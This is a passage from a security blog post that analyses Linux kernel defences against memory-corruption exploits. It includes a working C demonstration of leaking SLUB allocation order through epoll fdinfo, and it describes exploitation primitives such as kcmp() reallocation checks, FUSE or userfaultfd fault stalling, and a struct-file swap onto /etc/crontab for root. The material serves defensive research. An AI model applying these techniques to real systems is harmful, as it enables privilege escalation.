In my opinion, the biggest limits on attack surface reduction as a defensive strategy are:

  1. It exposes a workaround to an implementation concern of the kernel (potential memory safety issues) in user-facing API, which can lead to compatibility issues and maintenance overhead - for example, from a security standpoint, I think it might be a good idea to require phone apps and systemd services to declare their intention to use the PTY subsystem at install time, but that would be an API change requiring some sort of action from application authors, creating friction that wouldn't be necessary if we were confident that the kernel is working properly. This might get especially messy in the case of software that invokes external binaries depending on configuration, e.g. a web server that needs PTY access when it is used for server administration. (This is somewhat less complicated when a benign-but-potentially-exploitable application actively applies restrictions to itself; but not every application author is necessarily willing to design a fine-grained sandbox for their code, and even then, there may be compatibility issues caused by libraries outside the application author's control.)
  2. It can't protect a subsystem from a context that fundamentally needs access to it. (E.g. Android's /dev/binder is directly accessible by Chrome renderers on Android because they have Android code running inside them.)
  3. It means that decisions that ought to not influence the security of a system (making an API that does not grant extra privileges available to some potentially-untrusted context) essentially involve a security tradeoff.

Still, in practice, I believe that attack surface reduction mechanisms (especially seccomp) are currently some of the most important defense mechanisms on Linux.

Against bugs in source code: Compile-time locking validation

The bug in TIOCSPGRP was a fairly straightforward violation of a straightforward locking rule: While a tty_struct is live, accessing its pgrp member is forbidden unless the ctrl_lock of the same tty_struct is held. This rule is sufficiently simple that it wouldn't be entirely unreasonable to expect the compiler to be able to verify it - as long as you somehow inform the compiler about this rule, because figuring out the intended locking rules just from looking at a piece of code can often be hard even for humans (especially when some of the code is incorrect).

When you are starting a new project from scratch, the overall best way to approach this is to use a memory-safe language - in other words, a language that has explicitly been designed such that the programmer has to provide the compiler with enough information about intended memory safety semantics that the compiler can automatically verify them. But for existing codebases, it might be worth looking into how much of this can be retrofitted.

Clang's Thread Safety Analysis feature does something vaguely like what we'd need to verify the locking in this situation:

$ nl -ba -s' ' thread-safety-test.cpp | sed 's|^   ||'
1 struct __attribute__((capability("mutex"))) mutex {
2 };
3
4 void lock_mutex(struct mutex *p) __attribute__((acquire_capability(*p)));
5 void unlock_mutex(struct mutex *p) __attribute__((release_capability(*p)));
6
7 struct foo {
8 int a __attribute__((guarded_by(mutex)));
9 struct mutex mutex;
10 };
11
12 int good(struct foo *p1, struct foo *p2) {
13 lock_mutex(&p1->mutex);
14 int result = p1->a;
15 unlock_mutex(&p1->mutex);
16 return result;
17 }
18
19 int bogus(struct foo *p1, struct foo *p2) {
20 lock_mutex(&p1->mutex);
21 int result = p2->a;
22 unlock_mutex(&p1->mutex);
23 return result;
24 }
$ clang++ -c -o thread-safety-test.o thread-safety-test.cpp -Wall -Wthread-safety
thread-safety-test.cpp:21:22: warning: reading variable 'a' requires holding mutex 'p2->mutex' [-Wthread-safety-precise]
int result = p2->a;
^
thread-safety-test.cpp:21:22: note: found near match 'p1->mutex'
1 warning generated.
$

However, this does not currently work when compiling as C code because the guarded_by attribute can't find the other struct member; it seems to have been designed mostly for use in C++ code. A more fundamental problem is that it also doesn't appear to have built-in support for distinguishing the different rules for accessing a struct member depending on the lifetime state of the object. For example, almost all objects with locked members will have initialization/destruction functions that have exclusive access to the entire object and can access members without locking. (The lock might not even be initialized in those states.)

Some objects also have more lifetime states; in particular, for many objects with RCU-managed lifetime, only a subset of the members may be accessed through an RCU reference without having upgraded the reference to a refcounted one beforehand. Perhaps this could be addressed by introducing a new type attribute that can be used to mark pointers to structs in special lifetime states? (For C++ code, Clang's Thread Safety Analysis simply disables all checks in all constructor/destructor functions.)

I am hopeful that, with some extensions, something vaguely like Clang's Thread Safety Analysis could be used to retrofit some level of compile-time safety against unintended data races. This will require adding a lot of annotations, in particular to headers, to document intended locking semantics; but such annotations are probably anyway necessary to enable productive work on a complex codebase. In my experience, when there are no detailed comments/annotations on locking rules, every attempt to change a piece of code you're not intimately familiar with (without introducing horrible memory safety bugs) turns into a foray into the thicket of the surrounding call graphs, trying to unravel the intentions behind the code.

The one big downside is that this requires getting the development community for the codebase on board with the idea of backfilling and maintaining such annotations. And someone has to write the analysis tooling that can verify the annotations.

At the moment, the Linux kernel does have some very coarse locking validation via sparse; but this infrastructure is not capable of detecting situations where the wrong lock is used or validating that a struct member is protected by a lock. It also can't properly deal with things like conditional locking, which makes it hard to use for anything other than spinlocks/RCU. The kernel's runtime locking validation via LOCKDEP is more advanced, but mostly with a focus on locking correctness of RCU pointers as well as deadlock detection (the main focus); again, there is no mechanism to, for example,automatically validate that a given struct member is only accessed under a specific lock (which would probably also be quite costly to implement with runtime validation). Also, as a runtime validation mechanism, it can't discover errors in code that isn't executed during testing (although it can combine separately observed behavior into race scenarios without ever actually observing the race).

Against bugs in source code: Global static locking analysis

An alternative approach to checking memory safety rules at compile time is to do it either after the entire codebase has been compiled, or with an external tool that analyzes the entire codebase. This allows the analysis tooling to perform analysis across compilation units, reducing the amount of information that needs to be made explicit in headers. This may be a more viable approach if peppering annotations everywhere across headers isn't viable; but it also reduces the utility to human readers of the code, unless the inferred semantics are made visible to them through some special code viewer. It might also be less ergonomic in the long run if changes to one part of the kernel could make the verification of other parts fail - especially if those failures only show up in some configurations.

I think global static analysis is probably a good tool for finding some subsets of bugs, and it might also help with finding the worst-case depth of kernel stacks or proving the absence of deadlocks, but it's probably less suited for proving memory safety correctness?

Against exploit primitives: Attack primitive reduction via syscall restrictions

(Yes, I made up that name because I thought that capturing this under "Attack surface reduction" is too muddy.)

Because allocator fastpaths (both in SLUB and in the page allocator) are implemented using per-CPU data structures, the ease and reliability of exploits that want to coax the kernel's memory allocators into reallocating memory in specific ways can be improved if the attacker has fine-grained control over the assignment of exploit threads to CPU cores. I'm calling such a capability, which provides a way to facilitate exploitation by influencing relevant system state/behavior, an "attack primitive" here. Luckily for us, Linux allows tasks to pin themselves to specific CPU cores without requiring any privilege using the sched_setaffinity() syscall.

(As a different example, one primitive that can provide an attacker with fairly powerful capabilities is being able to indefinitely stall kernel faults on userspace addresses via FUSE or userfaultfd.)

Just like in the section "Attack surface reduction" above, an attacker's ability to use these primitives can be reduced by filtering syscalls; but while the mechanism and the compatibility concerns are similar, the rest is fairly different:

Attack primitive reduction does not normally reliably prevent a bug from being exploited; and an attacker will sometimes even be able to obtain a similar but shoddier (more complicated, less reliable, less generic, ...) primitive indirectly, for example:

Attack surface reduction is about limiting access to code that is suspected to contain exploitable bugs; in a codebase written in a memory-unsafe language, that tends to apply to pretty much the entire codebase. Attack surface reduction is often fairly opportunistic: You permit the things you need, and deny the rest by default.

Attack primitive reduction limits access to code that is suspected or known to provide (sometimes very specific) exploitation primitives. For example, one might decide to specifically forbid access to FUSE and userfaultfd for most code because of their utility for kernel exploitation, and, if one of those interfaces is truly needed, design a workaround that avoids exposing the attack primitive to userspace. This is different from attack surface reduction, where it often makes sense to permit access to any feature that a legitimate workload wants to use.

A nice example of an attack primitive reduction is the sysctl vm.unprivileged_userfaultfd, which was first introduced so that userfaultfd can be made completely inaccessible to normal users and was then later adjusted so that users can be granted access to part of its functionality without gaining the dangerous attack primitive. (But if you can create unprivileged user namespaces, you can still use FUSE to get an equivalent effect.)

When maintaining lists of allowed syscalls for a sandboxed system component, or something along those lines, it may be a good idea to explicitly track which syscalls are explicitly forbidden for attack primitive reduction reasons, or similarly strong reasons - otherwise one might accidentally end up permitting them in the future. (I guess that's kind of similar to issues that one can run into when maintaining ACLs...)

But like in the previous section, attack primitive reduction also tends to rely on making some functionality unavailable, and so it might not be viable in all situations. For example, newer versions of Android deliberately indirectly give apps access to FUSE through the AppFuse mechanism. (That API doesn't actually give an app direct access to /dev/fuse, but it does forward read/write requests to the app.)

Against oops-based oracles: Lockout or panic on crash

The ability to recover from kernel oopses in an exploit can help an attacker compensate for a lack of information about system state. Under some circumstances, it can even serve as a binary oracle that can be used to more or less perform a binary search for a value, or something like that.

(It used to be even worse on some distributions, where dmesg was accessible for unprivileged users; so if you managed to trigger an oops or WARN, you could then grab the register states at all IRET frames in the kernel stack, which could be used to leak things like kernel pointers. Luckily nowadays most distributions, including Ubuntu 20.10, restrict dmesg access.)

Android and Chrome OS nowadays set the kernel's panic_on_oops flag, meaning the machine will immediately restart when a kernel oops happens. This makes it hard to use oopsing as part of an exploit, and arguably also makes more sense from a reliability standpoint - the system will be down for a bit, and it will lose its existing state, but it will also reset into a known-good state instead of continuing in a potentially half-broken state, especially if the crashing thread was holding mutexes that can never again be released, or things like that. On the other hand, if some service crashes on a desktop system, perhaps that shouldn't cause the whole system to immediately go down and make you lose unsaved state - so panic_on_oops might be too drastic there.

A good solution to this might require a more fine-grained approach. (For example, grsecurity has for a long time had the ability to lock out specific UIDs that have caused crashes.) Perhaps it would make sense to allow the init daemon to use different policies for crashes in different services/sessions/UIDs?

Against UAF access: Deterministic UAF mitigation

One defense that would reliably stop an exploit for this issue would be a deterministic use-after-free mitigation. Such a mitigation would reliably protect the memory formerly occupied by the object from accesses through dangling pointers to the object, at least once the memory has been reused for a different purpose (including reuse to store heap metadata). For write operations, this probably requires either atomicity of the access check and the actual write or an RCU-like delayed freeing mechanism. For simple read operations, it can also be implemented by ordering the access check after the read, but before the read value is used.

A big downside of this approach on its own is that extra checks on every memory access will probably come with an extremely high efficiency penalty, especially if the mitigation can not make any assumptions about what kinds of parallel accesses might be happening to an object, or what semantics pointers have. (The proof-of-concept implementation I presented at LSSNA 2020 (slides, recording) had CPU overhead roughly in the range 60%-159% in kernel-heavy benchmarks, and ~8% for a very userspace-heavy benchmark.)

Unfortunately, even a deterministic use-after-free mitigation often won't be enough to deterministically limit the blast radius of something like a refcounting mistake to the object in which it occurred. Consider a case where two codepaths concurrently operate on the same object: Codepath A assumes that the object is live and subject to normal locking rules. Codepath B knows that the reference count reached zero, assumes that it therefore has exclusive access to the object (meaning all members are mutable without any locking requirements), and is trying to tear down the object. Codepath B might then start dropping references the object was holding on other objects while codepath A is following the same references. This could then lead to use-after-frees on pointed-to objects. If all data structures are subject to the same mitigation, this might not be too much of a problem; but if some data structures (like struct page) are not protected, it might permit a mitigation bypass.

Similar issues apply to data structures with union members that are used in different object states; for example, here's some random kernel data structure with an rcu_head in a union (just a random example, there isn't anything wrong with this code as far as I know):

struct allowedips_node {
struct wg_peer __rcu *peer;
struct allowedips_node __rcu *bit[2];
/* While it may seem scandalous that we waste space for v4,
* we're alloc'ing to the nearest power of 2 anyway, so this
* doesn't actually make a difference.
*/
u8 bits[16] __aligned(__alignof(u64));
u8 cidr, bit_at_a, bit_at_b, bitlen;

/* Keep rarely used list at bottom to be beyond cache line. */
union {
struct list_head peer_list;
struct rcu_head rcu;
};
};

As long as everything is working properly, the peer_list member is only used while the object is live, and the rcu member is only used after the object has been scheduled for delayed freeing; so this code is completely fine. But if a bug somehow caused the peer_list to be read after the rcu member has been initialized, type confusion would result.

In my opinion, this demonstrates that while UAF mitigations do have a lot of value (and would have reliably prevented exploitation of this specific bug), a use-after-free is just one possible consequence of the symptom class "object state confusion" (which may or may not be the same as the bug class of the root cause). It would be even better to enforce rules on object states, and ensure that an object e.g. can't be accessed through a "refcounted" reference anymore after the refcount has reached zero and has logically transitioned into a state like "non-RCU members are exclusively owned by thread performing teardown" or "RCU callback pending, non-RCU members are uninitialized" or "exclusive access to RCU-protected members granted to thread performing teardown, other members are uninitialized". Of course, doing this as a runtime mitigation would be even costlier and messier than a reliable UAF mitigation; this level of protection is probably only realistic with at least some level of annotations and static validation.

Against UAF access: Probabilistic UAF mitigation; pointer leaks

Summary: Some types of probabilistic UAF mitigation break if the attacker can leak information about pointer values; and information about pointer values easily leaks to userspace, e.g. through pointer comparisons in map/set-like structures.

If a deterministic UAF mitigation is too costly, an alternative is to do it probabilistically; for example, by tagging pointers with a small number of bits that are checked against object metadata on access, and then changing that object metadata when objects are freed.

The downside of this approach is that information leaks can be used to break the protection. One example of a type of information leak that I'd like to highlight (without any judgment on the relative importance of this compared to other types of information leaks) are intentional pointer comparisons, which have quite a few facets.

A relatively straightforward example where this could be an issue is the kcmp() syscall. This syscall compares two kernel objects using an arithmetic comparison of their permuted pointers (using a per-boot randomized permutation, see kptr_obfuscate()) and returns the result of the comparison (smaller, equal or greater). This gives userspace a way to order handles to kernel objects (e.g. file descriptors) based on the identities of those kernel objects (e.g. struct file instances), which in turn allows userspace to group a set of such handles by backing kernel object in O(n*log(n)) time using a standard sorting algorithm.

This syscall can be abused for improving the reliability of use-after-free exploits against some struct types because it checks whether two pointers to kernel objects are equal without accessing those objects: An attacker can allocate an object, somehow create a reference to the object that is not counted properly, free the object, reallocate it, and then verify whether the reallocation indeed reused the same address by comparing the dangling reference and a reference to the new object with kcmp(). If kcmp() includes the pointer's tag bits in the comparison, this would likely also permit breaking probabilistic UAF mitigations.

Essentially the same concern applies when a kernel pointer is encrypted and then given to userspace in fuse_lock_owner_id(), which encrypts the pointer to a files_struct with an open-coded version of XTEA before passing it to a FUSE daemon.

In both these cases, explicitly stripping tag bits would be an acceptable workaround because a pointer without tag bits still uniquely identifies a memory location; and given that these are very special interfaces that intentionally expose some degree of information about kernel pointers to userspace, it would be reasonable to adjust this code manually.

A somewhat more interesting example is the behavior of this piece of userspace code:

#define _GNU_SOURCE
#include <sys/epoll.h>
#include <sys/eventfd.h>
#include <sys/resource.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>

#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})

int main(void) {
struct rlimit rlim;
SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));
rlim.rlim_cur = rlim.rlim_max;
SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));

cpu_set_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(0, &cpuset);
SYSCHK(sched_setaffinity(0, sizeof(cpuset), &cpuset));

int epfd = SYSCHK(epoll_create1(0));
for (int i=0; i<1000; i++)
SYSCHK(eventfd(0, 0));
for (int i=0; i<192; i++) {
int fd = SYSCHK(eventfd(0, 0));
struct epoll_event event = {
.events = EPOLLIN,
.data = { .u64 = i }
};
SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event));
}

char cmd[100];
sprintf(cmd, "cat /proc/%d/fdinfo/%d", getpid(), epfd);
system(cmd);
}

It first creates a ton of eventfds that aren't used. Then it creates a bunch more eventfds and creates epoll watches for them, in creation order, with a monotonically incrementing counter in the "data" field. Afterwards, it asks the kernel to print the current state of the epoll instance, which comes with a list of all registered epoll watches, including the value of the data member (in hex). But how is this list sorted? Here's the result of running that code in a Ubuntu 20.10 VM (truncated, because it's a bit long):

[email protected]:~/epoll_fdinfo$ ./epoll_fdinfo 
pos: 0
flags: 02
mnt_id: 14
tfd: 1040 events: 19 data: 24 pos:0 ino:2f9a sdev:d
tfd: 1050 events: 19 data: 2e pos:0 ino:2f9a sdev:d
tfd: 1024 events: 19 data: 14 pos:0 ino:2f9a sdev:d
tfd: 1029 events: 19 data: 19 pos:0 ino:2f9a sdev:d
tfd: 1048 events: 19 data: 2c pos:0 ino:2f9a sdev:d
tfd: 1042 events: 19 data: 26 pos:0 ino:2f9a sdev:d
tfd: 1026 events: 19 data: 16 pos:0 ino:2f9a sdev:d
tfd: 1033 events: 19 data: 1d pos:0 ino:2f9a sdev:d
[...]

The data: field here is the loop index we stored in the .data member, formatted as hex. Here is the complete list of the data values in decimal:

36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19, 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110, 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10, 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118, 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81, 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160, 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

While these look sort of random, you can see that the list can be split into blocks of length 32 that consist of shuffled contiguous sequences of numbers:

Block 1 (32 values in range 19-50):
36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19

Block 2 (32 values in range 83-114):
95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110

Block 3 (19 values in range 0-18):
12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10

Block 4 (32 values in range 115-146):
135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118

Block 5 (32 values in range 51-82):
66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81

Block 6 (32 values in range 147-178):
177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160

Block 7 (13 values in range 179-191):
186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

What's going on here becomes clear when you look at the data structures epoll uses internally. ep_insert calls ep_rbtree_insert to insert a struct epitem into a red-black tree (a type of sorted binary tree); and this red-black tree is sorted using a tuple of a struct file * and a file descriptor number:

/* Compare RB tree keys */
static inline int ep_cmp_ffd(struct epoll_filefd *p1,
struct epoll_filefd *p2)
{
return (p1->file > p2->file ? +1:
(p1->file < p2->file ? -1 : p1->fd - p2->fd));
}

So the values we're seeing have been ordered based on the virtual address of the corresponding struct file; and SLUB allocates struct file from order-1 pages (i.e. pages of size 8 KiB), which can hold 32 objects each:

[email protected]:/sys/kernel/slab/filp# cat order 
1
[email protected]:/sys/kernel/slab/filp# cat objs_per_slab
32
[email protected]:/sys/kernel/slab/filp#

This explains the grouping of the numbers we saw: Each block of 32 contiguous values corresponds to an order-1 page that was previously empty and is used by SLUB to allocate objects until it becomes full.

With that knowledge, we can transform those numbers a bit, to show the order in which objects were allocated inside each page (excluding pages for which we haven't seen all allocations):

$ cat slub_demo.py 
#!/usr/bin/env python3
blocks = [
[ 36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19 ],
[ 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110 ],
[ 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10 ],
[ 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118 ],
[ 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81 ],
[ 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160 ],
[ 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184 ]
]

for alloc_indices in blocks:
if len(alloc_indices) != 32:
continue
# indices of allocations ('data'), sorted by memory location, shifted to be relative to the block
alloc_indices_relative = [position - min(alloc_indices) for position in alloc_indices]
# reverse mapping: memory locations of allocations,
# sorted by index of allocation ('data').
# if we've observed all allocations in a page,
# these will really be indices into the page.
memory_location_by_index = [alloc_indices_relative.index(idx) for idx in range(0, len(alloc_indices))]
print(memory_location_by_index)
$ ./slub_demo.py
[31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17]
[16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14]
[23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27]
[20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2]
[5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15]

And these sequences are almost the same, except that they have been rotated around by different amounts. This is exactly the SLUB freelist randomization scheme, as introduced in commit 210e7a43fa905!

When a SLUB kmem_cache is created (an instance of the SLUB allocator for a specific size class and potentially other specific attributes, usually initialized at boot time), init_cache_random_seq and cache_random_seq_create fill an array ->random_seq with randomly-ordered object indices via Fisher-Yates shuffle, with the array length equal to the number of objects that fit into a page. Then, whenever SLUB grabs a new page from the lower-level page allocator, it initializes the page freelist using the indices from ->random_seq, starting at a random index in the array (and wrapping around when the end is reached). (I'm ignoring the low-order allocation fallback here.)

So in summary, we can bypass SLUB randomization for the slab from which struct file is allocated because someone used it as a lookup key in a specific type of data structure. This is already fairly undesirable if SLUB randomization is supposed to provide protection against some types of local attacks for all slabs.

The heap-randomization-weakening effect of such data structures is not necessarily limited to cases where elements of the data structure can be listed in-order by userspace: If there was a codepath that iterated through the tree in-order and freed all tree nodes, that could have a similar effect, because the objects would be placed on the allocator's freelist sorted by address, cancelling out the randomization. In addition, you might be able to leak information about iteration order through cache side channels or such.

If we introduce a probabilistic use-after-free mitigation that relies on attackers not being able to learn whether the uppermost bits of an object's address changed after it was reallocated, this data structure could also break that. This case is messier than things like kcmp() because here the address ordering leak stems from a standard data structure.

You may have noticed that some of the examples I'm using here would be more or less limited to cases where an attacker is reallocating memory with the same type as the old allocation, while a typical use-after-free attack ends up replacing an object with a differently-typed one to cause type confusion. As an example of a bug that can be exploited for privilege escalation without type confusion at the C structure level, see entry 808 in our bugtracker. My exploit for that bug first starts a writev() operation on a writable file, lets the kernel validate that the file is indeed writable, then replaces the struct file with a read-only file pointing to /etc/crontab, and lets writev() continue. This allows gaining root privileges through a use-after-free bug without having to mess around with kernel pointers, data structure layouts, ROP, or anything like that. Of course that approach doesn't work with every use-after-free though.

(By the way: For an example of pointer leaks through container data structures in a JavaScript engine, see this bug I reported to Firefox back in 2016, when I wasn't a Google employee, which leaks the low 32 bits of a pointer by timing operations on pessimal hash tables - basically turning the HashDoS attack into an infoleak. Of course, nowadays, a side-channel-based pointer leak in a JS engine would probably not be worth treating as a security bug anymore, since you can probably get the same result with Spectre...)

Against freeing SLUB pages: Preventing virtual address reuse beyond the slab

(Also discussed a little bit on the kernel-hardening list in this thread.)

A weaker but less CPU-intensive alternative to trying to provide complete use-after-free protection for individual objects would be to ensure that virtual addresses that have been used for slab memory are never reused outside the slab, but that physical pages can still be reused. This would be the same basic approach as used by PartitionAlloc and others. In kernel terms, that would essentially mean serving SLUB allocations from vmalloc space.

Some challenges I can think of with this approach are:

  • SLUB allocations are currently served from the linear mapping, which normally uses hugepages; if vmalloc mappings with 4K PTEs were used instead, TLB pressure might increase, which might lead to some performance degradation.
  • To be able to use SLUB allocations in contexts that operate directly on physical memory, it is sometimes necessary for SLUB pages to be physically contiguous. That's not really a problem, but it is different from default vmalloc behavior. (Sidenote: DMA buffers don't always have to be physically contiguous - if you have an IOMMU, you can use that to map discontiguous pages to a contiguous DMA address range, just like how normal page tables create virtually-contiguous memory. See this kernel-internal API for an example that makes use of this, and Fuchsia's documentation for a high-level overview of how all this works in general.)
  • Some parts of the kernel convert back and forth between virtual addresses, struct page pointers, and (for interaction with hardware) physical addresses. This is a relatively straightforward mapping for addresses in the linear mapping, but would become a bit more complicated for vmalloc addresses. In particular, page_to_virt() and phys_to_virt() would have to be adjusted.
    • This is probably also going to be an issue for things like Memory Tagging, since pointer tags will have to be reconstructed when converting back to a virtual address. Perhaps it would make sense to forbid these helpers outside low-level memory management, and change existing users to instead keep a normal pointer to the allocation around? Or maybe you could let pointers to struct page carry the tag bits for the corresponding virtual address in unused/ignored address bits?

The probability that this defense can prevent UAFs from leading to exploitable type confusion depends somewhat on the granularity of slabs; if specific struct types have their own slabs, it provides more protection than if objects are only grouped by size. So to improve the utility of virtually-backed slab memory, it would be necessary to replace the generic kmalloc slabs (which contain various objects, grouped only by size) with ones that are segregated by type and/or allocation site. (The grsecurity/PaX folks have vaguely alluded to doing something roughly along these lines using compiler instrumentation.)

After reallocation as pagetable: Structure layout randomization

Memory safety issues are often exploited in a way that involves creating a type confusion; e.g. exploiting a use-after-free by replacing the freed object with a new object of a different type.

A defense that first appeared in grsecurity/PaX is to shuffle the order of struct members at build time to make it harder to exploit type confusions involving structs; the upstream Linux version of this is in scripts/gcc-plugins/randomize_layout_plugin.c.

How effective this is depends partly on whether the attacker is forced to exploit the issue as a confusion between two structs, or whether the attacker can instead exploit it as a confusion between a struct and an array (e.g. containing characters, pointers or PTEs). Especially if only a single struct member is accessed, a struct-array confusion might still be viable by spraying the entire array with identical elements. Against the type confusion described in this blogpost (between struct pid and page table entries), structure layout randomization could still be somewhat effective, since the reference count is half the size of a PTE and therefore can randomly be placed to overlap either the lower or the upper half of a PTE. (Except that the upstream Linux version of randstruct only randomizes explicitly-marked structs or structs containing only function pointers, and struct pid has no such marking.)

Of course, drawing a clear distinction between structs and arrays oversimplifies things a bit; for example, there might be struct types that have a large number of pointers of the same type or attacker-controlled values, not unlike an array.

If the attacker can not completely sidestep structure layout randomization by spraying the entire struct, the level of protection depends on how kernel builds are distributed:

  • If the builds are created centrally by one vendor and distributed to a large number of users, an attacker who wants to be able to compromise users of this vendor would have to rework their exploit to use a different type confusion for each release, which may force the attacker to rewrite significant chunks of the exploit.
  • If the kernel is individually built per machine (or similar), and the kernel image is kept secret, an attacker who wants to reliably exploit a target system may be forced to somehow leak information about some structure layouts and either prepare exploits for many different possible struct layouts in advance or write parts of the exploit interactively after leaking information from the target system.

To maximize the benefit of structure layout randomization in an environment where kernels are built centrally by a distribution/vendor, it would be necessary to make randomization a boot-time process by making structure offsets relocatable. (Or install-time, but that would break code signing.) Doing this cleanly (for example, such that 8-bit and 16-bit immediate displacements can still be used for struct member access where possible) would probably require a lot of fiddling with compiler internals, from the C frontend all the way to the emission of relocations. A somewhat hacky version of this approach already exists for C->BPF compilation as BPF CO-RE, using the clang builtin __builtin_preserve_access_index, but that relies on debuginfo, which probably isn't a very clean approach.

Potential issues with structure layout randomization are:

  • If structures are hand-crafted to be particularly cache-efficient, fully randomizing structure layout could worsen cache behavior. The existing randstruct implementation optionally avoids this by trying to randomize only within a cache line.
  • Unless the randomization is applied in a way that is reflected in DWARF debug info and such (which it isn't in the existing GCC-based implementation), it can make debugging and introspection harder.
  • It can break code that makes assumptions about structure layout; but such code is gross and should be cleaned up anyway (and Gustavo Silva has been working on fixing some of those issues).

While structure layout randomization by itself is limited in its effectiveness by struct-array confusions, it might be more reliable in combination with limited heap partitioning: If the heap is partitioned such that only struct-struct confusion is possible, and structure layout randomization makes struct-struct confusion difficult to exploit, and no struct in the same heap partition has array-like properties, then it would probably become much harder to directly exploit a UAF as type confusion. On the other hand, if the heap is already partitioned like that, it might make more sense to go all the way with heap partitioning and create one partition per type instead of dealing with all the hassle of structure layout randomization.

(By the way, if structure layouts are randomized, padding should probably also be randomized explicitly instead of always being on the same side to maximally randomize structure members with low alignment; see my list post on this topic for details.)

Control Flow Integrity

I want to explicitly point out that kernel Control Flow Integrity would have had no impact at all on this exploit strategy. By using a data-only strategy, we avoid having to leak addresses, avoid having to find ROP gadgets for a specific kernel build, and are completely unaffected by any defenses that attempt to protect kernel code or kernel control flow. Things like getting access to arbitrary files, increasing the privileges of a process, and so on don't require kernel instruction pointer control.

Like in my last blogpost on Linux kernel exploitation (which was about a buggy subsystem that an Android vendor added to their downstream kernel), to me, a data-only approach to exploitation feels very natural and seems less messy than trying to hijack control flow anyway.

Maybe things are different for userspace code; but for attacks by userspace against the kernel, I don't currently see a lot of utility in CFI because it typically only affects one of many possible methods for exploiting a bug. (Although of course there could be specific cases where a bug can only be exploited by hijacking control flow, e.g. if a type confusion only permits overwriting a function pointer and none of the permitted callees make assumptions about input types or privileges that could be broken by changing the function pointer.)

Making important data readonly

A defense idea that has shown up in a bunch of places (including Samsung phone kernels and XNU kernels for iOS) is to make data that is crucial to kernel security read-only except when it is intentionally being written to - the idea being that even if an attacker has an arbitrary memory write, they should not be able to directly overwrite specific pieces of data that are of exceptionally high importance to system security, such as credential structures, page tables, or (on iOS, using PPL) userspace code pages.

